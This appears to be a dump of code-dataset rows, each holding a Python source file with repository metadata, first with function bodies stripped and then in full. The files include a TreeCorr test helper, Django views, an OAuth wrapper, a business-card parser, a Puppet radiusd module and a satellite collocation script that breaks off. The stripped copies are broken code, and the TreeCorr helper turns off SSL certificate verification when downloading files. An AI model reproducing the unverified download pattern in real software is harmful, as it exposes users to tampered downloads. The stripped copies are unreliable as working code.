eae98172e8895a24f8d31ce413ff2889797337bb | 8,087 | py | Python | tests/test_helper.py | zchvsre/TreeCorr | 825dc0a9d4754f9d98ebcf9c26dee9597915d650 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/test_helper.py | zchvsre/TreeCorr | 825dc0a9d4754f9d98ebcf9c26dee9597915d650 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/test_helper.py | zchvsre/TreeCorr | 825dc0a9d4754f9d98ebcf9c26dee9597915d650 | [
"BSD-2-Clause-FreeBSD"
] | 1 | 2020-12-14T16:23:33.000Z | 2020-12-14T16:23:33.000Z | # Copyright (c) 2003-2019 by Mike Jarvis
#
# TreeCorr is free software: redistribution and use in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions, and the disclaimer given in the accompanying LICENSE
# file.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the disclaimer given in the documentation
# and/or other materials provided with the distribution.
from __future__ import print_function
import logging
import sys
import os
def get_from_wiki(file_name):
"""We host some larger files used for the test suite separately on the TreeCorr wiki repo
so people don't need to download them with the code when checking out the repo.
Most people don't run the tests after all.
"""
local_file_name = os.path.join('data',file_name)
url = 'https://github.com/rmjarvis/TreeCorr/wiki/' + file_name
if not os.path.isfile(local_file_name):
try:
from urllib.request import urlopen
except ImportError:
from urllib import urlopen
import shutil
print('downloading %s from %s...'%(local_file_name,url))
# urllib.request.urlretrieve(url,local_file_name)
# The above line doesn't work very well with the SSL certificate that github puts on it.
# It works fine in a web browser, but on my laptop I get:
# urllib.error.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:600)>
# The solution is to open a context that doesn't do ssl verification.
# But that can only be done with urlopen, not urlretrieve. So, here is the solution.
# cf. http://stackoverflow.com/questions/7243750/download-file-from-web-in-python-3
# http://stackoverflow.com/questions/27835619/ssl-certificate-verify-failed-error
try:
import ssl
context = ssl._create_unverified_context()
u = urlopen(url, context=context)
except (AttributeError, TypeError):
# Note: prior to 2.7.9, there is no such function or even the context keyword.
u = urlopen(url)
with open(local_file_name, 'wb') as out:
shutil.copyfileobj(u, out)
u.close()
print('done.')
def which(program):
"""
Mimic functionality of unix which command
"""
if sys.platform == "win32" and not program.endswith(".exe"):
program += ".exe"
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
def get_script_name(file_name):
"""
Check if the file_name is in the path. If not, prepend appropriate path to it.
"""
if which(file_name) is not None:
return file_name
else:
test_dir = os.path.split(os.path.realpath(__file__))[0]
root_dir = os.path.split(test_dir)[0]
script_dir = os.path.join(root_dir, 'scripts')
exe_file_name = os.path.join(script_dir, file_name)
print('Warning: The script %s is not in the path.'%file_name)
print(' Using explcit path for the test:',exe_file_name)
return exe_file_name
class CaptureLog(object):
"""A context manager that saves logging output into a string that is accessible for
checking in unit tests.
After exiting the context, the attribute `output` will have the logging output.
Sample usage:
>>> with CaptureLog() as cl:
... cl.logger.info('Do some stuff')
>>> assert cl.output == 'Do some stuff'
"""
# Replicate a small part of the nose package to get the `assert_raises` function/context-manager
# without relying on nose as a dependency.
import unittest
_t = Dummy('nop')
assert_raises = getattr(_t, 'assertRaises')
#if sys.version_info > (3,2):
if False:
# Note: this should work, but at least sometimes it fails with:
# RuntimeError: dictionary changed size during iteration
# cf. https://bugs.python.org/issue29620
# So just use our own (working) implementation for all Python versions.
assert_warns = getattr(_t, 'assertWarns')
else:
from contextlib import contextmanager
import warnings
@contextmanager
del Dummy
del _t
# Context to make it easier to profile bits of the code
def do_pickle(obj1, func = lambda x : x):
"""Check that the object is picklable. Also that it has basic == and != functionality.
"""
try:
import cPickle as pickle
except:
import pickle
import copy
print('Try pickling ',str(obj1))
#print('pickled obj1 = ',pickle.dumps(obj1))
obj2 = pickle.loads(pickle.dumps(obj1))
assert obj2 is not obj1
#print('obj1 = ',repr(obj1))
#print('obj2 = ',repr(obj2))
f1 = func(obj1)
f2 = func(obj2)
#print('func(obj1) = ',repr(f1))
#print('func(obj2) = ',repr(f2))
assert f1 == f2
# Check that == works properly if the other thing isn't the same type.
assert f1 != object()
assert object() != f1
obj3 = copy.copy(obj1)
assert obj3 is not obj1
f3 = func(obj3)
assert f3 == f1
obj4 = copy.deepcopy(obj1)
assert obj4 is not obj1
f4 = func(obj4)
assert f4 == f1
| 33.83682 | 120 | 0.629034 | # Copyright (c) 2003-2019 by Mike Jarvis
#
# TreeCorr is free software: redistribution and use in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions, and the disclaimer given in the accompanying LICENSE
# file.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the disclaimer given in the documentation
# and/or other materials provided with the distribution.
from __future__ import print_function
import logging
import sys
import os
def get_from_wiki(file_name):
"""We host some larger files used for the test suite separately on the TreeCorr wiki repo
so people don't need to download them with the code when checking out the repo.
Most people don't run the tests after all.
"""
local_file_name = os.path.join('data',file_name)
url = 'https://github.com/rmjarvis/TreeCorr/wiki/' + file_name
if not os.path.isfile(local_file_name):
try:
from urllib.request import urlopen
except ImportError:
from urllib import urlopen
import shutil
print('downloading %s from %s...'%(local_file_name,url))
# urllib.request.urlretrieve(url,local_file_name)
# The above line doesn't work very well with the SSL certificate that github puts on it.
# It works fine in a web browser, but on my laptop I get:
# urllib.error.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:600)>
# The solution is to open a context that doesn't do ssl verification.
# But that can only be done with urlopen, not urlretrieve. So, here is the solution.
# cf. http://stackoverflow.com/questions/7243750/download-file-from-web-in-python-3
# http://stackoverflow.com/questions/27835619/ssl-certificate-verify-failed-error
try:
import ssl
context = ssl._create_unverified_context()
u = urlopen(url, context=context)
except (AttributeError, TypeError):
# Note: prior to 2.7.9, there is no such function or even the context keyword.
u = urlopen(url)
with open(local_file_name, 'wb') as out:
shutil.copyfileobj(u, out)
u.close()
print('done.')
def which(program):
"""
Mimic functionality of unix which command
"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
if sys.platform == "win32" and not program.endswith(".exe"):
program += ".exe"
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
def get_script_name(file_name):
"""
Check if the file_name is in the path. If not, prepend appropriate path to it.
"""
if which(file_name) is not None:
return file_name
else:
test_dir = os.path.split(os.path.realpath(__file__))[0]
root_dir = os.path.split(test_dir)[0]
script_dir = os.path.join(root_dir, 'scripts')
exe_file_name = os.path.join(script_dir, file_name)
print('Warning: The script %s is not in the path.'%file_name)
print(' Using explcit path for the test:',exe_file_name)
return exe_file_name
def timer(f):
import functools
@functools.wraps(f)
def f2(*args, **kwargs):
import time
t0 = time.time()
result = f(*args, **kwargs)
t1 = time.time()
fname = repr(f).split()[1]
print('time for %s = %.2f' % (fname, t1-t0))
return result
return f2
class CaptureLog(object):
"""A context manager that saves logging output into a string that is accessible for
checking in unit tests.
After exiting the context, the attribute `output` will have the logging output.
Sample usage:
>>> with CaptureLog() as cl:
... cl.logger.info('Do some stuff')
>>> assert cl.output == 'Do some stuff'
"""
def __init__(self, level=3):
logging_levels = { 0: logging.CRITICAL,
1: logging.WARNING,
2: logging.INFO,
3: logging.DEBUG }
self.logger = logging.getLogger('CaptureLog')
self.logger.setLevel(logging_levels[level])
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
self.stream = StringIO()
self.handler = logging.StreamHandler(self.stream)
self.logger.addHandler(self.handler)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.handler.flush()
self.output = self.stream.getvalue().strip()
self.handler.close()
# Replicate a small part of the nose package to get the `assert_raises` function/context-manager
# without relying on nose as a dependency.
import unittest
class Dummy(unittest.TestCase):
def nop():
pass
_t = Dummy('nop')
assert_raises = getattr(_t, 'assertRaises')
#if sys.version_info > (3,2):
if False:
# Note: this should work, but at least sometimes it fails with:
# RuntimeError: dictionary changed size during iteration
# cf. https://bugs.python.org/issue29620
# So just use our own (working) implementation for all Python versions.
assert_warns = getattr(_t, 'assertWarns')
else:
from contextlib import contextmanager
import warnings
@contextmanager
def assert_warns_context(wtype):
# When used as a context manager
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
yield w
assert len(w) >= 1, "Expected warning %s was not raised."%(wtype)
assert issubclass(w[0].category, wtype), \
"Warning raised was the wrong type (got %s, expected %s)"%(
w[0].category, wtype)
def assert_warns(wtype, *args, **kwargs):
if len(args) == 0:
return assert_warns_context(wtype)
else:
# When used as a regular function
func = args[0]
args = args[1:]
with assert_warns(wtype):
res = func(*args, **kwargs)
return res
del Dummy
del _t
# Context to make it easier to profile bits of the code
class profile(object):
def __init__(self, sortby='tottime', nlines=30):
self.sortby = sortby
self.nlines = nlines
def __enter__(self):
import cProfile, pstats
self.pr = cProfile.Profile()
self.pr.enable()
return self
def __exit__(self, type, value, traceback):
import pstats
self.pr.disable()
ps = pstats.Stats(self.pr).sort_stats(self.sortby)
ps.print_stats(self.nlines)
def do_pickle(obj1, func = lambda x : x):
"""Check that the object is picklable. Also that it has basic == and != functionality.
"""
try:
import cPickle as pickle
except:
import pickle
import copy
print('Try pickling ',str(obj1))
#print('pickled obj1 = ',pickle.dumps(obj1))
obj2 = pickle.loads(pickle.dumps(obj1))
assert obj2 is not obj1
#print('obj1 = ',repr(obj1))
#print('obj2 = ',repr(obj2))
f1 = func(obj1)
f2 = func(obj2)
#print('func(obj1) = ',repr(f1))
#print('func(obj2) = ',repr(f2))
assert f1 == f2
# Check that == works properly if the other thing isn't the same type.
assert f1 != object()
assert object() != f1
obj3 = copy.copy(obj1)
assert obj3 is not obj1
f3 = func(obj3)
assert f3 == f1
obj4 = copy.deepcopy(obj1)
assert obj4 is not obj1
f4 = func(obj4)
assert f4 == f1
| 2,156 | 11 | 332 |
365807fa799c620482b02b59ad08f208daa23081 | 671 | py | Python | backend/api/views.py | 50Bytes-dev/vue-test | de1f1aeaabf16d93ee5ba6f0115ef43cb5c0be7b | [
"MIT"
] | null | null | null | backend/api/views.py | 50Bytes-dev/vue-test | de1f1aeaabf16d93ee5ba6f0115ef43cb5c0be7b | [
"MIT"
] | 13 | 2020-01-05T09:01:03.000Z | 2022-02-26T22:01:35.000Z | backend/api/views.py | 50Bytes-dev/vue-test | de1f1aeaabf16d93ee5ba6f0115ef43cb5c0be7b | [
"MIT"
] | null | null | null | from django.views.generic import TemplateView
from django.views.decorators.cache import never_cache
from rest_framework import viewsets
from .models import *
# Serve Vue Application
index_view = never_cache(TemplateView.as_view(template_name='index.html'))
class PostViewSet(viewsets.ModelViewSet):
"""
API конечная точка для Постов для редактирования и т.д.
"""
queryset = Post.objects.prefetch_related('photos').all()
serializer_class = PostSerializer
class PhotoViewSet(viewsets.ModelViewSet):
"""
API конечная точка для Фото для редактирования и т.д.
"""
queryset = Photo.objects.all()
serializer_class = PhotoSerializer
| 26.84 | 74 | 0.752608 | from django.views.generic import TemplateView
from django.views.decorators.cache import never_cache
from rest_framework import viewsets
from .models import *
# Serve Vue Application
index_view = never_cache(TemplateView.as_view(template_name='index.html'))
class PostViewSet(viewsets.ModelViewSet):
"""
API конечная точка для Постов для редактирования и т.д.
"""
queryset = Post.objects.prefetch_related('photos').all()
serializer_class = PostSerializer
class PhotoViewSet(viewsets.ModelViewSet):
"""
API конечная точка для Фото для редактирования и т.д.
"""
queryset = Photo.objects.all()
serializer_class = PhotoSerializer
| 0 | 0 | 0 |
fced81d859b616ac0980e3c8bdc82ecefdbdff0e | 333 | py | Python | src/socialite/oauth/github.py | garzola/masonite-socialite | 70cb80365e2096773e291f84b6e7af81a276ac1b | [
"MIT"
] | 13 | 2020-02-02T01:27:51.000Z | 2021-11-08T08:50:57.000Z | src/socialite/oauth/github.py | garzola/masonite-socialite | 70cb80365e2096773e291f84b6e7af81a276ac1b | [
"MIT"
] | 17 | 2020-02-05T16:52:45.000Z | 2021-05-16T14:34:46.000Z | src/socialite/oauth/github.py | garzola/masonite-socialite | 70cb80365e2096773e291f84b6e7af81a276ac1b | [
"MIT"
] | 6 | 2020-02-03T14:20:30.000Z | 2021-03-18T01:33:21.000Z | from socialite.helpers import get_config
from .base import BaseOAuth2
| 30.272727 | 66 | 0.732733 | from socialite.helpers import get_config
from .base import BaseOAuth2
class GithubAPI(object):
def __init__(self, token, **kwargs):
client_id = get_config('socialite.SOCIAL_AUTH_GITHUB_KEY')
self.oauth_session = BaseOAuth2(client_id, token=token)
self.oauth_session.BASE_URL = 'https://api.github.com'
| 209 | 3 | 50 |
0c9d7da300296569dd584e6d10e28c99acc205a9 | 535 | py | Python | src/main/python/helloworld.py | martinchapman/tmrweb | 7dbf699d815ac198948778ad9b9fbd371d17c1b3 | [
"MIT"
] | 2 | 2020-09-21T07:53:10.000Z | 2021-07-16T19:36:06.000Z | src/main/python/helloworld.py | martinchapman/tmrweb | 7dbf699d815ac198948778ad9b9fbd371d17c1b3 | [
"MIT"
] | 1 | 2021-08-31T22:25:33.000Z | 2021-08-31T22:25:33.000Z | src/main/python/helloworld.py | martinchapman/tmrweb | 7dbf699d815ac198948778ad9b9fbd371d17c1b3 | [
"MIT"
] | 4 | 2020-05-01T13:08:58.000Z | 2020-05-04T15:07:50.000Z | import sys
from pyswip import Prolog
helloworld(); | 41.153846 | 228 | 0.700935 | import sys
from pyswip import Prolog
def helloworld():
prolog = Prolog();
prolog.assertz("use_module(library(semweb/turtle))");
prolog.assertz("use_module(library(semweb/rdf_http_plugin))");
prolog.assertz("use_module(library(semweb/rdf_db))");
for soln in prolog.query("rdf_load('https://www.dropbox.com/s/33v1zze5fpbmnzh/model.ttl?raw=1', [format('turtle'), register_namespaces(false), base_uri('http://anonymous.org/vocab/'), graph('http://anonymous.org/vocab')])"):
print(soln);
helloworld(); | 457 | 0 | 23 |
883871dac04a34651083669b83444bfa65ba822f | 4,492 | py | Python | BusinessCardParser/BusinessCardParser.py | dariangarcia-404/breezy-palm-tree | 4c6403addda32209799fb84be97f1008b823f28f | [
"MIT"
] | null | null | null | BusinessCardParser/BusinessCardParser.py | dariangarcia-404/breezy-palm-tree | 4c6403addda32209799fb84be97f1008b823f28f | [
"MIT"
] | null | null | null | BusinessCardParser/BusinessCardParser.py | dariangarcia-404/breezy-palm-tree | 4c6403addda32209799fb84be97f1008b823f28f | [
"MIT"
] | null | null | null | import spacy
import ContactInfo
DIVIDER = "~" # CONSTANT which defines dividing str between card entries in a file
class BusinessCardParser:
""" Function getContactInfo
Input(s): document with text from one business card (string).
Output(s): A (ContactInfo) object that contains vital information about the card owner.
Description: Where the magic happens. Calls methods that identify vital info.
"""
""" Function isName
Input(s): an entry (string) from a business card string
Output(s): a (string) if it is a name, else false (boolean).
Runtime: > O(m), m = characters in entry. Takes long b/c of NLP machine learning
"""
""" Function isPhone
Input(s): an entry (string) from a business card string
Output(s): a (string) if it is a phone, else false (boolean).
Runtime: O(2m) => O(m), m = characters in entry
"""
""" Function isEmail
Input(s): an entry (string) from a business card string
Output(s): a (string) if it is a email, else false (boolean).
Runtime: O(2m) => O(m), m = characters in entry
"""
""" Function starter
* does the heavy lifting (I/O, calling methods)
Input(s): n/a
Output(s): a (dictionary) containing contacts with name (string) as key
Runtime: O(n), n = number of business cards
"""
if __name__ == '__main__':
main()
| 36.819672 | 104 | 0.563001 | import spacy
import ContactInfo
DIVIDER = "~" # CONSTANT which defines dividing str between card entries in a file
class BusinessCardParser:
def __init__(self):
parse = True # could be used as flag in future dev
""" Function getContactInfo
Input(s): document with text from one business card (string).
Output(s): A (ContactInfo) object that contains vital information about the card owner.
Description: Where the magic happens. Calls methods that identify vital info.
"""
def getContactInfo(self, doc):
name = phone = email = False # set variables to False
entries = doc.split('\n')
for entry in entries:
found = False
if not name:
name = self.is_name(entry)
if name:
found = True
if not phone and not found:
phone = self.is_phone(entry)
if phone:
found = True
if not email and not found:
email = self.is_email(entry)
contact = ContactInfo.ContactInfo(name, phone, email)
contact.dumpInfo()
return contact
""" Function isName
Input(s): an entry (string) from a business card string
Output(s): a (string) if it is a name, else false (boolean).
Runtime: > O(m), m = characters in entry. Takes long b/c of NLP machine learning
"""
def is_name(self, entry):
nlp = spacy.load("en_core_web_sm")
doc = nlp(entry)
for ent in doc.ents:
if ent.label_ == 'PERSON':
return entry
return False
""" Function isPhone
Input(s): an entry (string) from a business card string
Output(s): a (string) if it is a phone, else false (boolean).
Runtime: O(2m) => O(m), m = characters in entry
"""
def is_phone(self, entry):
new_phone = ''
if 'fax' in entry.lower():
return False
for char in entry:
if char.isdigit(): # if we're looking at a number
new_phone += char # add it to the phone number
if len(new_phone) == 10 or len(new_phone) == 11:
return new_phone
return False
""" Function isEmail
Input(s): an entry (string) from a business card string
Output(s): a (string) if it is a email, else false (boolean).
Runtime: O(2m) => O(m), m = characters in entry
"""
def is_email(self, entry):
words = entry.split(" ")
for word in words:
if '@' in word:
return word
return False
""" Function starter
* does the heavy lifting (I/O, calling methods)
Input(s): n/a
Output(s): a (dictionary) containing contacts with name (string) as key
Runtime: O(n), n = number of business cards
"""
def starter():
parser = BusinessCardParser()
print("Welcome to the Business Card Parser!")
print("You can input a file of business cards, divided by", DIVIDER, "by inputting the file name.")
print("You can input a business card manually, line by line, by hitting ENTER")
response = input("Input file name or hit ENTER to continue: ")
contacts = {}
if response == "": # user wants to enter card manually
business_card = ""
while True:
response = input("enter line (or 'END' to stop):")
if response.upper() == "END":
break
else:
business_card += (response + '\n') # add new line to manual business card
contact = parser.getContactInfo(business_card)
contacts[contact.getName()] = contact
else: # we got a file (hopefully)
cards_file = open(response, "r")
all_lines = cards_file.readlines()
business_card = ""
for line in all_lines:
if DIVIDER in line:
contact = parser.getContactInfo(business_card)
contacts[contact.getName()] = contact
business_card = ""
else:
business_card += (line + '\n')
contact = parser.getContactInfo(business_card)
contacts[contact.getName()] = contact
return contacts
def main():
_contacts = starter() # contains a dictionary of contacts for future use & dev
if __name__ == '__main__':
main()
| 2,862 | 0 | 181 |
13526b075b407598c9ed9715d00c04476fd42e21 | 573 | py | Python | tests/test_python_check.py | SoftwareStartups/pygithook | 2fa9186a4b8981cc2926fd49917a52a85a563b82 | [
"MIT"
] | null | null | null | tests/test_python_check.py | SoftwareStartups/pygithook | 2fa9186a4b8981cc2926fd49917a52a85a563b82 | [
"MIT"
] | null | null | null | tests/test_python_check.py | SoftwareStartups/pygithook | 2fa9186a4b8981cc2926fd49917a52a85a563b82 | [
"MIT"
] | null | null | null | """Testsuite for vfgithook.pylint_check"""
from vfgithook import pylint_check
from . import util
# pylint: disable=protected-access
def test_is_python_file(gitrepo):
"""Test pylint_check.is_python_file"""
# Extension
file_a = util.write_file(gitrepo, 'a.py', '')
assert pylint_check._is_python_file(file_a)
# Empty
file_b = util.write_file(gitrepo, 'b', '')
assert not pylint_check._is_python_file(file_b)
# Shebang
file_c = util.write_file(gitrepo, 'b', '#!/usr/bin/env python')
assert pylint_check._is_python_file(file_c)
| 22.92 | 67 | 0.710297 | """Testsuite for vfgithook.pylint_check"""
from vfgithook import pylint_check
from . import util
# pylint: disable=protected-access
def test_is_python_file(gitrepo):
"""Test pylint_check.is_python_file"""
# Extension
file_a = util.write_file(gitrepo, 'a.py', '')
assert pylint_check._is_python_file(file_a)
# Empty
file_b = util.write_file(gitrepo, 'b', '')
assert not pylint_check._is_python_file(file_b)
# Shebang
file_c = util.write_file(gitrepo, 'b', '#!/usr/bin/env python')
assert pylint_check._is_python_file(file_c)
| 0 | 0 | 0 |
32a16a55f75b4456cfd80f9c9cce22f840685253 | 32 | py | Python | src/temp/tasks.py | lucemia/django_p_test | 3642f00735392d360d015dce554fccd0dbe2d874 | [
"MIT"
] | null | null | null | src/temp/tasks.py | lucemia/django_p_test | 3642f00735392d360d015dce554fccd0dbe2d874 | [
"MIT"
] | null | null | null | src/temp/tasks.py | lucemia/django_p_test | 3642f00735392d360d015dce554fccd0dbe2d874 | [
"MIT"
] | null | null | null | from django_p.tasks import Pipe
| 16 | 31 | 0.84375 | from django_p.tasks import Pipe
| 0 | 0 | 0 |
129b8e38aa216e22d39c6892742cec6e61022d52 | 309 | py | Python | xlab/data/calc/__init__.py | dayfine/xlab | 2c51d84906d5eba568e5b5c70225c2eccb1b9fc3 | [
"MIT"
] | 2 | 2020-05-06T04:05:30.000Z | 2020-11-10T16:23:50.000Z | xlab/data/calc/__init__.py | dayfine/xlab | 2c51d84906d5eba568e5b5c70225c2eccb1b9fc3 | [
"MIT"
] | 14 | 2020-05-06T06:37:50.000Z | 2021-10-30T03:38:05.000Z | xlab/data/calc/__init__.py | dayfine/xlab | 2c51d84906d5eba568e5b5c70225c2eccb1b9fc3 | [
"MIT"
] | null | null | null | from xlab.data.calc.interface import RecursiveInputs
from xlab.data.calc.interface import SourceInputs
from xlab.data.calc.interface import CalcInputs
from xlab.data.calc.interface import CalcTimeSpecs
from xlab.data.calc.interface import CalcProducer
from xlab.data.calc.interface import CalcProducerFactory
| 44.142857 | 56 | 0.864078 | from xlab.data.calc.interface import RecursiveInputs
from xlab.data.calc.interface import SourceInputs
from xlab.data.calc.interface import CalcInputs
from xlab.data.calc.interface import CalcTimeSpecs
from xlab.data.calc.interface import CalcProducer
from xlab.data.calc.interface import CalcProducerFactory
| 0 | 0 | 0 |
d260b0c05487ef9bc11a658508f81ea27e3b3992 | 841 | py | Python | myauth/forms.py | dedol1/verauth_api | ca242abfdcc5296ca4c459e4e92c5dd313cd7160 | [
"MIT"
] | null | null | null | myauth/forms.py | dedol1/verauth_api | ca242abfdcc5296ca4c459e4e92c5dd313cd7160 | [
"MIT"
] | null | null | null | myauth/forms.py | dedol1/verauth_api | ca242abfdcc5296ca4c459e4e92c5dd313cd7160 | [
"MIT"
] | 1 | 2021-11-02T11:55:26.000Z | 2021-11-02T11:55:26.000Z | from django import forms
from .models import *
| 33.64 | 107 | 0.536266 | from django import forms
from .models import *
class ImageForm(forms.ModelForm):
class Meta:
model= User
fields = ('username', 'first_name', 'last_name','password', 'email',)
widgets = {
'first_name': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Ex: John Doe'}),
'last_name': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Ex: John Doe2'}),
'username': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Ex: 30'}),
'email': forms.TextInput(attrs={'class': 'form-control'}),
}
class ImageFormTwo(forms.ModelForm):
class Meta:
model = TwoFactor
fields = ('img',)
# widgets = {
# 'img': forms.FileField(),
# } | 0 | 732 | 49 |
9964dfc6eb57f2989b5fa962e1e9f520802f8a82 | 1,542 | py | Python | modules/radiusd.py | dhtech/puppet-modules | a5ddcdc6a01d87052043f075f417e692a26883a8 | [
"BSD-3-Clause"
] | 3 | 2018-10-23T21:14:01.000Z | 2018-11-28T08:55:12.000Z | modules/radiusd.py | dhtech/puppet-modules | a5ddcdc6a01d87052043f075f417e692a26883a8 | [
"BSD-3-Clause"
] | 125 | 2018-10-26T08:35:52.000Z | 2021-11-28T13:18:48.000Z | modules/radiusd.py | dhtech/puppet-modules | a5ddcdc6a01d87052043f075f417e692a26883a8 | [
"BSD-3-Clause"
] | 2 | 2021-11-18T19:09:49.000Z | 2021-11-26T12:56:19.000Z | # Copyright 2018 dhtech
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file
import lib
# vim: ts=4: sts=4: sw=4: expandtab
| 30.84 | 57 | 0.661479 | # Copyright 2018 dhtech
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file
import lib
def generate(host, *args):
access_node_ips = lib.resolve_nodes_to_ip(
lib.get_nodes_with_layer('access'))
dist_node_ips = lib.resolve_nodes_to_ip(
lib.get_nodes_with_layer('dist'))
core_node_ips = lib.resolve_nodes_to_ip(
lib.get_nodes_with_layer('core'))
firewall_node_ips = lib.resolve_nodes_to_ip(
lib.get_nodes_with_layer('firewall'))
partner_node_ips = lib.resolve_nodes_to_ip(
lib.get_nodes_with_layer('partner'))
access_ips = []
for node, addresses in access_node_ips.iteritems():
access_ips.append([node, addresses[0]])
dist_ips = []
for node, addresses in dist_node_ips.iteritems():
dist_ips.append([node, addresses[0]])
core_ips = []
for node, addresses in core_node_ips.iteritems():
core_ips.append([node, addresses[0]])
firewall_ips = []
for node, addresses in firewall_node_ips.iteritems():
firewall_ips.append([node, addresses[0]])
partner_ips = []
for node, addresses in partner_node_ips.iteritems():
partner_ips.append([node, addresses[0]])
info = {}
info['access_ips'] = access_ips
info['dist_ips'] = dist_ips
info['core_ips'] = core_ips
info['firewall_ips'] = firewall_ips
info['partner_ips'] = partner_ips
return {'radiusd': info}
# vim: ts=4: sts=4: sw=4: expandtab
| 1,343 | 0 | 23 |
fc93e4b656c844361c9ae7b2fbcaa70e55f59061 | 658 | py | Python | Sentiment.py | Elon-Chan/Sentiment-Analysis | dd7ec0dcdc4944a7366c289707aa46788558e0a2 | [
"MIT"
] | null | null | null | Sentiment.py | Elon-Chan/Sentiment-Analysis | dd7ec0dcdc4944a7366c289707aa46788558e0a2 | [
"MIT"
] | null | null | null | Sentiment.py | Elon-Chan/Sentiment-Analysis | dd7ec0dcdc4944a7366c289707aa46788558e0a2 | [
"MIT"
] | null | null | null | import dash
from dash.dependencies import Input, Output
import dash_core_components as dcc # graphs etc
import dash_html_components as html # tags etc
app = dash.Dash() # dash can combine wth flask
app.layout = html.Div(children=[
dcc.Input(id = "Input", value = "Enter Something", type = "text"),
html.Div(id = "Output")
])
@app.callback(
Output(component_id="Output", component_property = "children"),
[Input(component_id="Input", component_property = "value")]
)
if __name__ == "__main__":
app.run_server(debug=True) | 25.307692 | 68 | 0.699088 | import dash
from dash.dependencies import Input, Output
import dash_core_components as dcc # graphs etc
import dash_html_components as html # tags etc
app = dash.Dash() # dash can combine wth flask
app.layout = html.Div(children=[
dcc.Input(id = "Input", value = "Enter Something", type = "text"),
html.Div(id = "Output")
])
@app.callback(
Output(component_id="Output", component_property = "children"),
[Input(component_id="Input", component_property = "value")]
)
def update_value(input_data):
try:
return str(float(input_data)**2)
except:
return "Some error"
if __name__ == "__main__":
app.run_server(debug=True) | 84 | 0 | 25 |
d032a6823e79d63d9ed63bc9a034259c6ad8939d | 71 | py | Python | cachetclient/__init__.py | neutron-ah/cachet-client | ad233e4b3ced956ad698e110ae547ba10d15f9a2 | [
"MIT"
] | null | null | null | cachetclient/__init__.py | neutron-ah/cachet-client | ad233e4b3ced956ad698e110ae547ba10d15f9a2 | [
"MIT"
] | null | null | null | cachetclient/__init__.py | neutron-ah/cachet-client | ad233e4b3ced956ad698e110ae547ba10d15f9a2 | [
"MIT"
] | null | null | null | from cachetclient.client import Client # noqa
___version__ = '3.0.0'
| 17.75 | 46 | 0.746479 | from cachetclient.client import Client # noqa
___version__ = '3.0.0'
| 0 | 0 | 0 |
044933f4e745b3f4ae6f65b666a90c8f86de3d53 | 6,160 | py | Python | main/collocation_processor_v2.py | dr1315/Collocation_v2 | b0fceedb4e5dcdd3900e56854435dea48a132642 | [
"MIT"
] | null | null | null | main/collocation_processor_v2.py | dr1315/Collocation_v2 | b0fceedb4e5dcdd3900e56854435dea48a132642 | [
"MIT"
] | null | null | null | main/collocation_processor_v2.py | dr1315/Collocation_v2 | b0fceedb4e5dcdd3900e56854435dea48a132642 | [
"MIT"
] | null | null | null | '''
Main processor for v2 of the collocation between CALIOP and Himawari-8.
'''
import os
import sys
import traceback
from datetime import datetime
from pyhdf.SD import SD, SDC
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"-l",
"--list_of_files",
nargs="?",
type=str,
help="name of .txt file listing all the files to be downloaded"
)
parser.add_argument(
"-f",
"--filename",
nargs="?",
type=str,
help="name of file to be downloaded"
)
parser.add_argument(
"-d",
"--target_directory",
nargs="?",
default=os.getcwd(),
type=str,
help="full path to the directory where the files will be stored"
)
args = parser.parse_args()
if args.list_of_files is not None:
main(args.list_of_files, args.target_directory)
elif args.filename is not None:
full_collocation(args.filename, args.target_directory)
else:
raise Exception('Need to provide a filename or a text file containing a list of filenames')
| 44.963504 | 296 | 0.677597 | '''
Main processor for v2 of the collocation between CALIOP and Himawari-8.
'''
import os
import sys
import traceback
from datetime import datetime
from pyhdf.SD import SD, SDC
def log_w_message(message):
dt_now = datetime.now().strftime("%d/%m/%Y %H:%M:%S.%f")
dt_message = f'{dt_now} - {message}'
print(dt_message)
return dt_message
def build_temp_folders(fname, target_dir):
staging_dir = os.path.join(target_dir, fname[:-4])
if not os.path.exists(staging_dir) and not os.path.isdir(staging_dir):
os.mkdir(staging_dir)
archive_dir = os.path.join(staging_dir, '.o+e_archive')
if not os.path.exists(archive_dir) and not os.path.isdir(archive_dir):
os.mkdir(archive_dir)
proc_data_dir = os.path.join(staging_dir, '.proc_data')
if not os.path.exists(proc_data_dir) and not os.path.isdir(proc_data_dir):
os.mkdir(proc_data_dir)
return staging_dir, archive_dir, proc_data_dir
def read_list(filename):
with open(filename, 'r') as f:
all_lines = [line[:-1] for line in f.readlines()]
header = [line for line in all_lines if line.startswith('#')]
good_lines = [line for line in all_lines if not line.startswith('#')]
return header, good_lines
def decompress_h8_data(data_dir):
h8_dirs = [dirs[1] for dirs in os.walk(data_dir)][0]
print(h8_dirs)
for h8_dir in h8_dirs:
full_dir = os.path.join(data_dir, h8_dir)
os.chdir(full_dir)
